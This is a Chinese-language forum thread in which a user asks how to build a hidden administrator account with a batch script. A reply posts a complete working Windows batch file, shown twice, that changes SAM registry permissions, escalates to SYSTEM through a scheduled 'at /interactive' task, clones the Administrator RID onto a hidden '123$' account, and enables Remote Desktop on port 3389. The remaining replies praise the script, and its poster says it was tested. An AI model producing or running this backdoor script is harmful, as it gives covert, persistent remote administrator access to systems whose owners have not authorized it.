标题: 提问:怎么样用批处理建立超级隐藏帐户。 [打印本页]
作者: newaifi 时间: 2007-2-26 09:34 标题: 提问:怎么样用批处理建立超级隐藏帐户。
网上找了一下,建立超级隐藏帐户需要用到注册表权限设置等一系列操作!
但如果是自建帐户的话重新启动了又会还原,所以本人想通过系统内置的但又很少用的 (如GUEST)账号来进行提权操作。
就是把GUEST账号设置为隐藏的管理员帐户,然后把该禁用的禁用!
Last edited by newaifi on 2007-2-27 at 03:40 AM ]
但如果是自建帐户的话重新启动了又会还原,所以本人想通过系统内置的但又很少用的 (如GUEST)账号来进行提权操作。
就是把GUEST账号设置为隐藏的管理员帐户,然后把该禁用的禁用!
Last edited by newaifi on 2007-2-27 at 03:40 AM ]
作者: newaifi 时间: 2007-3-1 14:46
自己顶一个。貌似大家对这个都不感兴趣!
作者: wangzenggogo 时间: 2009-8-25 01:04
@echo off
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1 17] >>1.txt
regini.exe 1.txt
del 1.txt
::首先 ,获得system的shell
:3
set a1=%time:~0,4%
set b1=%time:~4,1%
if %time:~6,2% EQU 55 goto 2
::减少CPU 100% 持续时间
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
taskkill /f /im explorer.exe
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
at %a1%%c% /interactive %systemroot%\explorer.exe
ping -n 30 127.1 >nul
::第一步 创建克隆账号
::设定克隆账号
set user=123
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
::创建账号名为%user%$ 密码为%user% 的隐藏账号
net user %user%$ %user% /add
::第二步 取出克隆账号的注册表项
::导出%user%$的rid标项
reg export %ridkey%Names\%user%$ %SystemRoot%\%user%$.reg
::取出%user%$的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%user%$.reg') do set userrid=%%i
::导出user$的账号配置项
reg export %ridkey%00000%userrid% %SystemRoot%\%userrid%.reg
::第三步 取出被克隆账号注册表项
::导出%buser%的rid标识项
reg export %ridkey%Names\%buser% %SystemRoot%\%buser%$.reg
::导出%buser%的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%buser%$.reg') do set buserrid=%%i
::导出buser$的账号配置想
reg export %ridkey%00000%buserrid% %SystemRoot%\%buserrid%.reg
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
::第四步 删除建立的克隆账号
net user %user%$ /del
::第五步 导入修改好的克隆账号注册表项
regedit /s %SystemRoot%\%user%-first.reg
regedit /s %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
regedit /s %SystemRoot%\3389.reg
del /q %SystemRoot%\3389.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [17] >>1.txt
regini.exe 1.txt
del 1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [1 17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1 17] >>1.txt
regini.exe 1.txt
del 1.txt
::首先 ,获得system的shell
:3
set a1=%time:~0,4%
set b1=%time:~4,1%
if %time:~6,2% EQU 55 goto 2
::减少CPU 100% 持续时间
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
taskkill /f /im explorer.exe
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
at %a1%%c% /interactive %systemroot%\explorer.exe
ping -n 30 127.1 >nul
::第一步 创建克隆账号
::设定克隆账号
set user=123
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
::创建账号名为%user%$ 密码为%user% 的隐藏账号
net user %user%$ %user% /add
::第二步 取出克隆账号的注册表项
::导出%user%$的rid标项
reg export %ridkey%Names\%user%$ %SystemRoot%\%user%$.reg
::取出%user%$的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%user%$.reg') do set userrid=%%i
::导出user$的账号配置项
reg export %ridkey%00000%userrid% %SystemRoot%\%userrid%.reg
::第三步 取出被克隆账号注册表项
::导出%buser%的rid标识项
reg export %ridkey%Names\%buser% %SystemRoot%\%buser%$.reg
::导出%buser%的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%buser%$.reg') do set buserrid=%%i
::导出buser$的账号配置想
reg export %ridkey%00000%buserrid% %SystemRoot%\%buserrid%.reg
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
::第四步 删除建立的克隆账号
net user %user%$ /del
::第五步 导入修改好的克隆账号注册表项
regedit /s %SystemRoot%\%user%-first.reg
regedit /s %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
regedit /s %SystemRoot%\3389.reg
del /q %SystemRoot%\3389.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [17] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [17] >>1.txt
regini.exe 1.txt
del 1.txt
作者: keen 时间: 2009-8-25 02:15 标题: 回复3楼
强悍,这都可以。
作者: wangzenggogo 时间: 2009-8-25 02:22
我测试了好几次,很好的!你只需要把用户名改了!
作者: llroy 时间: 2009-8-25 07:09
太强大了。